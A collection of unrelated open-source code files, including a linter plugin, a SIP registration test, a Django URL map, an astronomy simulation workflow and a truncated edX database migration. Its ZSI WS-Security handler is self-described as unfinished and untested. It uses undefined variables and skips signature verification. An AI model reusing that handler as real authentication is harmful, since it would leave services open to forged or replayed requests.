environmentfunction, evalcontextfunction, contextfunction, \
is_undefined
__all__ = [
'Environment', 'Template', 'BaseLoader', 'FileSystemLoader',
'PackageLoader', 'DictLoader', 'FunctionLoader', 'PrefixLoader',
'ChoiceLoader', 'BytecodeCache', 'FileSystemBytecodeCache',
'MemcachedBytecodeCache', 'Undefined', 'DebugUndefined',
'StrictUndefined', 'TemplateError', 'UndefinedError', 'TemplateNotFound',
'TemplatesNotFound', 'TemplateSyntaxError', 'TemplateAssertionError',
'ModuleLoader', 'environmentfilter', 'contextfilter', 'Markup', 'escape',
'environmentfunction', 'contextfunction', 'clear_caches', 'is_undefined',
'evalcontextfilter', 'evalcontextfunction'
]
|
danalec/dotfiles | refs/heads/master | sublime/.config/sublime-text-3/Packages/SublimeLinter-contrib-lua-globals/linter.py | 2 | #
# linter.py
# Linter for SublimeLinter3, a code checking framework for Sublime Text 3
#
# Written by Patrick Kish
# Copyright (c) 2014 Patrick Kish
#
# License: MIT
#
"""This module exports the LuaGlobals plugin class."""
from os.path import dirname, join, realpath
FOLDER_PATH = dirname(realpath(__file__))
from SublimeLinter.lint import Linter
class LuaGlobals(Linter):
"""Provides an interface to lua-globals."""
syntax = 'lua'
script_path = join(FOLDER_PATH, 'findglobals.lua')
cmd = 'lua "' + script_path + '" "@"'
regex = (
r'\s*\[(?P<line>\d+)\]\s+'
r'((?P<warning>G:)|(?P<error>S:))'
r'(?P<message>.+?(?::\s(?P<near>.*)|$))'
)
tempfile_suffix = "lua"
|
DouglasHeriot/pjproject | refs/heads/master | tests/pjsua/scripts-run/200_register.py | 42 | # $Id$
#
from inc_cfg import *
# Basic registration
test_param = TestParam(
"Basic registration",
[
InstanceParam( "client",
"--null-audio"+
" --id=\"<sip:test1@pjsip.org>\""+
" --registrar=sip:sip.pjsip.org" +
" --username=test1" +
" --password=test1" +
" --realm=*",
uri="sip:test1@pjsip.org",
have_reg=True),
]
)
|
sassoftware/catalog-service | refs/heads/master | catalogService/libs/viclient_vendor/ZSI/twisted/WSsecurity.py | 3 | ###########################################################################
# Joshua R. Boverhof, LBNL
# See Copyright for copyright notice!
# $Id: WSsecurity.py 1134 2006-02-24 00:23:06Z boverhof $
###########################################################################
import sys, time, warnings
import sha, base64
# twisted & related imports
from zope.interface import classProvides, implements, Interface
from twisted.python import log, failure
from twisted.web.error import NoResource
from twisted.web.server import NOT_DONE_YET
from twisted.internet import reactor
import twisted.web.http
import twisted.web.resource
# ZSI imports
from ZSI import _get_element_nsuri_name, EvaluateException, ParseException
from ZSI.parse import ParsedSoap
from ZSI.writer import SoapWriter
from ZSI.TC import _get_global_element_declaration as GED
from ZSI import fault
from ZSI.wstools.Namespaces import OASIS, DSIG
from WSresource import DefaultHandlerChain, HandlerChainInterface,\
WSAddressCallbackHandler, DataHandler, WSAddressHandler
#
# Global Element Declarations
#
UsernameTokenDec = GED(OASIS.WSSE, "UsernameToken")
SecurityDec = GED(OASIS.WSSE, "Security")
SignatureDec = GED(DSIG.BASE, "Signature")
PasswordDec = GED(OASIS.WSSE, "Password")
NonceDec = GED(OASIS.WSSE, "Nonce")
CreatedDec = GED(OASIS.UTILITY, "Created")
if None in [UsernameTokenDec,SecurityDec,SignatureDec,PasswordDec,NonceDec,CreatedDec]:
raise ImportError, 'required global element(s) unavailable: %s ' %({
(OASIS.WSSE, "UsernameToken"):UsernameTokenDec,
(OASIS.WSSE, "Security"):SecurityDec,
(DSIG.BASE, "Signature"):SignatureDec,
(OASIS.WSSE, "Password"):PasswordDec,
(OASIS.WSSE, "Nonce"):NonceDec,
(OASIS.UTILITY, "Created"):CreatedDec,
})
#
# Stability: Unstable, Untested, Not Finished.
#
class WSSecurityHandler:
"""Web Services Security: SOAP Message Security 1.0
Class Variables:
debug -- If True provide more detailed SOAP:Fault information to clients.
"""
classProvides(HandlerChainInterface)
debug = True
@classmethod
def processRequest(cls, ps, **kw):
if type(ps) is not ParsedSoap:
raise TypeError,'Expecting ParsedSoap instance'
security = ps.ParseHeaderElements([cls.securityDec])
# Assume all security headers are supposed to be processed here.
for pyobj in security or []:
for any in pyobj.Any or []:
if any.typecode is UsernameTokenDec:
try:
ps = cls.UsernameTokenProfileHandler.processRequest(ps, any)
except Exception, ex:
if cls.debug: raise
raise RuntimeError, 'Unauthorized Username/passphrase combination'
continue
if any.typecode is SignatureDec:
try:
ps = cls.SignatureHandler.processRequest(ps, any)
except Exception, ex:
if cls.debug: raise
raise RuntimeError, 'Invalid Security Header'
continue
raise RuntimeError, 'WS-Security, Unsupported token %s' %str(any)
return ps
@classmethod
def processResponse(cls, output, **kw):
return output
class UsernameTokenProfileHandler:
"""Web Services Security UsernameToken Profile 1.0
Class Variables:
targetNamespace --
"""
classProvides(HandlerChainInterface)
# Class Variables
targetNamespace = OASIS.WSSE
sweepInterval = 60*5
nonces = None
# Set to None to disable
PasswordText = targetNamespace + "#PasswordText"
PasswordDigest = targetNamespace + "#PasswordDigest"
# Override passwordCallback
passwordCallback = lambda cls,username: None
@classmethod
def sweep(cls, index):
"""remove nonces every sweepInterval.
Parameters:
index -- remove all nonces up to this index.
"""
if cls.nonces is None:
cls.nonces = []
seconds = cls.sweepInterval
cls.nonces = cls.nonces[index:]
reactor.callLater(seconds, cls.sweep, len(cls.nonces))
@classmethod
def processRequest(cls, ps, token, **kw):
"""
Parameters:
ps -- ParsedSoap instance
token -- UsernameToken pyclass instance
"""
if token.typecode is not UsernameTokenDec:
raise TypeError, 'expecting GED (%s,%s) representation.' %(
UsernameTokenDec.nspname, UsernameTokenDec.pname)
username = token.Username
# expecting only one password
# may have a nonce and a created
password = nonce = timestamp = None
for any in token.Any or []:
if any.typecode is PasswordDec:
password = any
continue
if any.typecode is NonceTypeDec:
nonce = any
continue
if any.typecode is CreatedTypeDec:
timestamp = any
continue
raise TypeError, 'UsernameTokenProfileHander unexpected %s' %str(any)
if password is None:
raise RuntimeError, 'Unauthorized, no password'
# TODO: not yet supporting complexType simpleContent in pyclass_type
attrs = getattr(password, password.typecode.attrs_aname, {})
pwtype = attrs.get('Type', cls.PasswordText)
# Clear Text Passwords
if cls.PasswordText is not None and pwtype == cls.PasswordText:
if password == cls.passwordCallback(username):
return ps
raise RuntimeError, 'Unauthorized, clear text password failed'
if cls.nonces is None: cls.sweep(0)
if nonce is not None:
if nonce in cls.nonces:
raise RuntimeError, 'Invalid Nonce'
# created was 10 seconds ago or sooner
if created is not None and created < time.gmtime(time.time()-10):
raise RuntimeError, 'UsernameToken created is expired'
cls.nonces.append(nonce)
# PasswordDigest, recommended that implemenations
# require a Nonce and Created
if cls.PasswordDigest is not None and pwtype == cls.PasswordDigest:
digest = sha.sha()
for i in (nonce, created, cls.passwordCallback(username)):
if i is None: continue
digest.update(i)
if password == base64.encodestring(digest.digest()).strip():
return ps
raise RuntimeError, 'Unauthorized, digest failed'
raise RuntimeError, 'Unauthorized, contents of UsernameToken unknown'
@classmethod
def processResponse(cls, output, **kw):
return output
@staticmethod
def hmac_sha1(xml):
return
class SignatureHandler:
"""Web Services Security UsernameToken Profile 1.0
"""
digestMethods = {
DSIG.BASE+"#sha1":sha.sha,
}
signingMethods = {
DSIG.BASE+"#hmac-sha1":hmac_sha1,
}
canonicalizationMethods = {
DSIG.C14N_EXCL:lambda node: Canonicalize(node, unsuppressedPrefixes=[]),
DSIG.C14N:lambda node: Canonicalize(node),
}
@classmethod
def processRequest(cls, ps, signature, **kw):
"""
Parameters:
ps -- ParsedSoap instance
signature -- Signature pyclass instance
"""
if token.typecode is not SignatureDec:
raise TypeError, 'expecting GED (%s,%s) representation.' %(
SignatureDec.nspname, SignatureDec.pname)
si = signature.SignedInfo
si.CanonicalizationMethod
calgo = si.CanonicalizationMethod.get_attribute_Algorithm()
for any in si.CanonicalizationMethod.Any:
pass
# Check Digest
si.Reference
context = XPath.Context.Context(ps.dom, processContents={'wsu':OASIS.UTILITY})
exp = XPath.Compile('//*[@wsu:Id="%s"]' %si.Reference.get_attribute_URI())
nodes = exp.evaluate(context)
if len(nodes) != 1:
raise RuntimeError, 'A SignedInfo Reference must refer to one node %s.' %(
si.Reference.get_attribute_URI())
try:
xml = cls.canonicalizeMethods[calgo](nodes[0])
except IndexError:
raise RuntimeError, 'Unsupported canonicalization algorithm'
try:
digest = cls.digestMethods[salgo]
except IndexError:
raise RuntimeError, 'unknown digestMethods Algorithm'
digestValue = base64.encodestring(digest(xml).digest()).strip()
if si.Reference.DigestValue != digestValue:
raise RuntimeError, 'digest does not match'
if si.Reference.Transforms:
pass
signature.KeyInfo
signature.KeyInfo.KeyName
signature.KeyInfo.KeyValue
signature.KeyInfo.RetrievalMethod
signature.KeyInfo.X509Data
signature.KeyInfo.PGPData
signature.KeyInfo.SPKIData
signature.KeyInfo.MgmtData
signature.KeyInfo.Any
signature.Object
# TODO: Check Signature
signature.SignatureValue
si.SignatureMethod
salgo = si.SignatureMethod.get_attribute_Algorithm()
if si.SignatureMethod.HMACOutputLength:
pass
for any in si.SignatureMethod.Any:
pass
# <SignedInfo><Reference URI="">
exp = XPath.Compile('//child::*[attribute::URI = "%s"]/..' %(
si.Reference.get_attribute_URI()))
nodes = exp.evaluate(context)
if len(nodes) != 1:
raise RuntimeError, 'A SignedInfo Reference must refer to one node %s.' %(
si.Reference.get_attribute_URI())
try:
xml = cls.canonicalizeMethods[calgo](nodes[0])
except IndexError:
raise RuntimeError, 'Unsupported canonicalization algorithm'
# TODO: Check SignatureValue
@classmethod
def processResponse(cls, output, **kw):
return output
class X509TokenProfileHandler:
"""Web Services Security UsernameToken Profile 1.0
"""
targetNamespace = DSIG.BASE
# Token Types
singleCertificate = targetNamespace + "#X509v3"
certificatePath = targetNamespace + "#X509PKIPathv1"
setCerticatesCRLs = targetNamespace + "#PKCS7"
@classmethod
def processRequest(cls, ps, signature, **kw):
return ps
"""
<element name="KeyInfo" type="ds:KeyInfoType"/>
<complexType name="KeyInfoType" mixed="true">
<choice maxOccurs="unbounded">
<element ref="ds:KeyName"/>
<element ref="ds:KeyValue"/>
<element ref="ds:RetrievalMethod"/>
<element ref="ds:X509Data"/>
<element ref="ds:PGPData"/>
<element ref="ds:SPKIData"/>
<element ref="ds:MgmtData"/>
<any processContents="lax" namespace="##other"/>
<!-- (1,1) elements from (0,unbounded) namespaces -->
</choice>
<attribute name="Id" type="ID" use="optional"/>
</complexType>
<element name="Signature" type="ds:SignatureType"/>
<complexType name="SignatureType">
<sequence>
<element ref="ds:SignedInfo"/>
<element ref="ds:SignatureValue"/>
<element ref="ds:KeyInfo" minOccurs="0"/>
<element ref="ds:Object" minOccurs="0" maxOccurs="unbounded"/>
</sequence>
<attribute name="Id" type="ID" use="optional"/>
</complexType>
<element name="SignatureValue" type="ds:SignatureValueType"/>
<complexType name="SignatureValueType">
<simpleContent>
<extension base="base64Binary">
<attribute name="Id" type="ID" use="optional"/>
</extension>
</simpleContent>
</complexType>
<!-- Start SignedInfo -->
<element name="SignedInfo" type="ds:SignedInfoType"/>
<complexType name="SignedInfoType">
<sequence>
<element ref="ds:CanonicalizationMethod"/>
<element ref="ds:SignatureMethod"/>
<element ref="ds:Reference" maxOccurs="unbounded"/>
</sequence>
<attribute name="Id" type="ID" use="optional"/>
</complexType>
"""
class WSSecurityHandlerChainFactory:
protocol = DefaultHandlerChain
@classmethod
def newInstance(cls):
return cls.protocol(WSAddressCallbackHandler, DataHandler,
WSSecurityHandler, WSAddressHandler())
|
SKA-ScienceDataProcessor/algorithm-reference-library | refs/heads/master | workflows/serial/simulation/simulation_serial.py | 1 | """ Pipelines expressed as dask components
"""
import logging
import numpy
from astropy import units as u
from astropy.coordinates import SkyCoord
from data_models.polarisation import PolarisationFrame
from data_models.memory_data_models import Visibility, BlockVisibility
from wrappers.serial.calibration.operations import apply_gaintable, create_gaintable_from_blockvisibility
from wrappers.serial.simulation.testing_support import simulate_gaintable
from processing_components.simulation.configurations import create_named_configuration
from wrappers.serial.visibility.base import create_blockvisibility, create_visibility
from wrappers.serial.visibility.coalesce import convert_blockvisibility_to_visibility, \
convert_visibility_to_blockvisibility
log = logging.getLogger(__name__)
def simulate_list_serial_workflow(config='LOWBD2',
phasecentre=SkyCoord(ra=+15.0 * u.deg, dec=-60.0 * u.deg, frame='icrs', equinox='J2000'),
frequency=None, channel_bandwidth=None, times=None,
polarisation_frame=PolarisationFrame("stokesI"), order='frequency',
format='blockvis',
rmax=1000.0,
zerow=False):
""" A component to simulate an observation
The simulation step can generate a single BlockVisibility or a list of BlockVisibility's.
The parameter keyword determines the way that the list is constructed.
If order='frequency' then len(frequency) BlockVisibility's with all times are created.
If order='time' then len(times) BlockVisibility's with all frequencies are created.
If order = 'both' then len(times) * len(times) BlockVisibility's are created each with
a single time and frequency. If order = None then all data are created in one BlockVisibility.
The output format can be either 'blockvis' (for calibration) or 'vis' (for imaging)
:param config: Name of configuration: def LOWBDS-CORE
:param phasecentre: Phase centre def: SkyCoord(ra=+15.0 * u.deg, dec=-60.0 * u.deg, frame='icrs', equinox='J2000')
:param frequency: def [1e8]
:param channel_bandwidth: def [1e6]
:param times: Observing times in radians: def [0.0]
:param polarisation_frame: def PolarisationFrame("stokesI")
:param order: 'time' or 'frequency' or 'both' or None: def 'frequency'
:param format: 'blockvis' or 'vis': def 'blockvis'
:return: vis_list with different frequencies in different elements
"""
if format == 'vis':
create_vis = create_visibility
else:
create_vis = create_blockvisibility
if times is None:
times = [0.0]
if channel_bandwidth is None:
channel_bandwidth = [1e6]
if frequency is None:
frequency = [1e8]
conf = create_named_configuration(config, rmax=rmax)
if order == 'time':
log.debug("simulate_list_serial_workflow: Simulating distribution in %s" % order)
vis_list = list()
for i, time in enumerate(times):
vis_list.append(create_vis(conf, numpy.array([times[i]]),
frequency=frequency,
channel_bandwidth=channel_bandwidth,
weight=1.0, phasecentre=phasecentre,
polarisation_frame=polarisation_frame,
zerow=zerow))
elif order == 'frequency':
log.debug("simulate_list_serial_workflow: Simulating distribution in %s" % order)
vis_list = list()
for j, _ in enumerate(frequency):
vis_list.append(create_vis(conf, times,
frequency=numpy.array([frequency[j]]),
channel_bandwidth=numpy.array(
[channel_bandwidth[j]]),
weight=1.0, phasecentre=phasecentre,
polarisation_frame=polarisation_frame,
zerow=zerow))
elif order == 'both':
log.debug("simulate_list_serial_workflow: Simulating distribution in time and frequency")
vis_list = list()
for i, _ in enumerate(times):
for j, _ in enumerate(frequency):
vis_list.append(create_vis(conf, numpy.array([times[i]]),
frequency=numpy.array([frequency[j]]),
channel_bandwidth=numpy.array(
[channel_bandwidth[j]]),
weight=1.0, phasecentre=phasecentre,
polarisation_frame=polarisation_frame,
zerow=zerow))
elif order is None:
log.debug("simulate_list_serial_workflow: Simulating into single %s" % format)
vis_list = list()
vis_list.append(create_vis(conf, times, frequency=frequency,
channel_bandwidth=channel_bandwidth,
weight=1.0, phasecentre=phasecentre,
polarisation_frame=polarisation_frame,
zerow=zerow))
else:
raise NotImplementedError("order $s not known" % order)
return vis_list
def corrupt_list_serial_workflow(vis_list, gt_list=None, seed=None, **kwargs):
""" Create a graph to apply gain errors to a vis_list
:param vis_list:
:param gt_list: Optional gain table graph
:param kwargs:
:return:
"""
def corrupt_vis(vis, gt, **kwargs):
if isinstance(vis, Visibility):
bv = convert_visibility_to_blockvisibility(vis)
else:
bv = vis
if gt is None:
gt = create_gaintable_from_blockvisibility(bv, **kwargs)
gt = simulate_gaintable(gt, **kwargs)
bv = apply_gaintable(bv, gt)
if isinstance(vis, Visibility):
return convert_blockvisibility_to_visibility(bv)
else:
return bv
if gt_list is None:
return [corrupt_vis(vis_list[ivis], None, **kwargs)
for ivis, v in enumerate(vis_list)]
else:
return [corrupt_vis(vis_list[ivis], gt_list[ivis], **kwargs)
for ivis, v in enumerate(vis_list)]
|
yuvalt/xbmc | refs/heads/master | lib/libUPnP/Platinum/Build/Tools/Scripts/MakeAllVs.py | 262 | #! /usr/bin/env python
import os
import sys
import getopt
import subprocess
configs = ['Debug', 'Release']
solutions = ['../../../Build/Targets/x86-microsoft-win32-vs2008/Platinum.sln']
try:
opts, args = getopt.getopt(sys.argv[1:], "b:rc")
except getopt.GetoptError, (msg, opt):
print 'No build_config, defaulting to build all'
for opt, arg in opts:
if opt == '-b':
config = arg
def CallVsMake(sln, cfg):
cmd = 'python VsMake.py -s %s -b %s' % (sln, cfg)
print cmd
retVal = subprocess.call(cmd.split())
if retVal != 0:
sys.exit(retVal)
for sln in solutions:
if 'config' not in locals() and 'config' not in globals():
print '************ Building all configurations **************'
for cfg in configs:
CallVsMake(sln, cfg)
else:
print '************ Building configuration=' + config + ' ****************'
CallVsMake(sln, config)
|
codingjoe/viewflow | refs/heads/master | tests/examples/customnode/flows.py | 3 | from viewflow import flow, views as flow_views
from viewflow.base import this, Flow
from . import models, views
from .nodes import DynamicSplit
class DynamicSplitFlow(Flow):
"""
Dynamic split
Depends on initial decision, several instances on make_decision task would be instantiated
"""
process_cls = models.DynamicSplitProcess
summary_template = """
Decision on: {{ process.question }}<br/>
{{ process.decision_set.count }} of {{ process.split_count }} completed
"""
start = flow.Start(flow_views.StartProcessView, fields=['question', 'split_count'],
task_result_summary="Asks for {{ process.split_count }} decisions") \
.Permission(auto_create=True) \
.Next(this.spit_on_decision)
spit_on_decision = DynamicSplit(lambda p: p.split_count) \
.Next(this.make_decision)
make_decision = flow.View(views.DecisionView,
task_description="Decision required") \
.Next(this.join_on_decision)
join_on_decision = flow.Join() \
.Next(this.end)
end = flow.End()
|
dianshen/github | refs/heads/master | day15/app01/urls.py | 1 | """day15 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url,include
from django.contrib import admin
from app01 import views
urlpatterns = [
url(r'^$',views.login),
url(r'^login/', views.login),
url(r'^resgiter/', views.resgiter),
url(r'^admin/', views.admin),
url(r'^book/', views.book),
url(r'^bookmodel/', views.bookmodel),
]
|
rue89-tech/edx-platform | refs/heads/master | lms/djangoapps/shoppingcart/migrations/0021_auto__add_field_orderitem_created__add_field_orderitem_modified.py | 120 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'OrderItem.created'
db.add_column('shoppingcart_orderitem', 'created',
self.gf('model_utils.fields.AutoCreatedField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'OrderItem.modified'
db.add_column('shoppingcart_orderitem', 'modified',
self.gf('model_utils.fields.AutoLastModifiedField')(default=datetime.datetime.now),
keep_default=False)
def backwards(self, orm):
# Deleting field 'OrderItem.created'
db.delete_column('shoppingcart_orderitem', 'created')
# Deleting field 'OrderItem.modified'
db.delete_column('shoppingcart_orderitem', 'modified')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'shoppingcart.certificateitem': {
'Meta': {'object_name': 'CertificateItem', '_ormbases': ['shoppingcart.OrderItem']},
'course_enrollment': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['student.CourseEnrollment']"}),
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '128', 'db_index': 'True'}),
'mode': ('django.db.models.fields.SlugField', [], {'max_length': '50'}),
'orderitem_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['shoppingcart.OrderItem']", 'unique': 'True', 'primary_key': 'True'})
},
'shoppingcart.coupon': {
'Meta': {'object_name': 'Coupon'},
'code': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '255'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2014, 11, 6, 0, 0)'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'percentage_discount': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'shoppingcart.couponredemption': {
'Meta': {'object_name': 'CouponRedemption'},
'coupon': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shoppingcart.Coupon']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'order': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shoppingcart.Order']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'shoppingcart.courseregcodeitem': {
'Meta': {'object_name': 'CourseRegCodeItem', '_ormbases': ['shoppingcart.OrderItem']},
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '128', 'db_index': 'True'}),
'mode': ('django.db.models.fields.SlugField', [], {'default': "'honor'", 'max_length': '50'}),
'orderitem_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['shoppingcart.OrderItem']", 'unique': 'True', 'primary_key': 'True'})
},
'shoppingcart.courseregcodeitemannotation': {
'Meta': {'object_name': 'CourseRegCodeItemAnnotation'},
'annotation': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'course_id': ('xmodule_django.models.CourseKeyField', [], {'unique': 'True', 'max_length': '128', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'shoppingcart.courseregistrationcode': {
'Meta': {'object_name': 'CourseRegistrationCode'},
'code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32', 'db_index': 'True'}),
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '255', 'db_index': 'True'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2014, 11, 6, 0, 0)'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'created_by_user'", 'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'invoice': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shoppingcart.Invoice']", 'null': 'True'}),
'order': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'purchase_order'", 'null': 'True', 'to': "orm['shoppingcart.Order']"})
},
'shoppingcart.donation': {
'Meta': {'object_name': 'Donation', '_ormbases': ['shoppingcart.OrderItem']},
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '255', 'db_index': 'True'}),
'donation_type': ('django.db.models.fields.CharField', [], {'default': "'general'", 'max_length': '32'}),
'orderitem_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['shoppingcart.OrderItem']", 'unique': 'True', 'primary_key': 'True'})
},
'shoppingcart.donationconfiguration': {
'Meta': {'object_name': 'DonationConfiguration'},
'change_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'changed_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'on_delete': 'models.PROTECT'}),
'enabled': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'shoppingcart.invoice': {
'Meta': {'object_name': 'Invoice'},
'address_line_1': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'address_line_2': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'address_line_3': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'city': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'company_contact_email': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'company_contact_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'company_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'country': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '255', 'db_index': 'True'}),
'customer_reference_number': ('django.db.models.fields.CharField', [], {'max_length': '63', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'internal_reference': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'is_valid': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'recipient_email': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'recipient_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'total_amount': ('django.db.models.fields.FloatField', [], {}),
'zip': ('django.db.models.fields.CharField', [], {'max_length': '15', 'null': 'True'})
},
'shoppingcart.order': {
'Meta': {'object_name': 'Order'},
'bill_to_cardtype': ('django.db.models.fields.CharField', [], {'max_length': '32', 'blank': 'True'}),
'bill_to_ccnum': ('django.db.models.fields.CharField', [], {'max_length': '8', 'blank': 'True'}),
'bill_to_city': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}),
'bill_to_country': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}),
'bill_to_first': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}),
'bill_to_last': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}),
'bill_to_postalcode': ('django.db.models.fields.CharField', [], {'max_length': '16', 'blank': 'True'}),
'bill_to_state': ('django.db.models.fields.CharField', [], {'max_length': '8', 'blank': 'True'}),
'bill_to_street1': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}),
'bill_to_street2': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}),
'company_contact_email': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'company_contact_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'company_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'currency': ('django.db.models.fields.CharField', [], {'default': "'usd'", 'max_length': '8'}),
'customer_reference_number': ('django.db.models.fields.CharField', [], {'max_length': '63', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'order_type': ('django.db.models.fields.CharField', [], {'default': "'personal'", 'max_length': '32'}),
'processor_reply_dump': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'purchase_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'recipient_email': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'recipient_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'refunded_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'cart'", 'max_length': '32'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'shoppingcart.orderitem': {
'Meta': {'object_name': 'OrderItem'},
'created': ('model_utils.fields.AutoCreatedField', [], {'default': 'datetime.datetime.now'}),
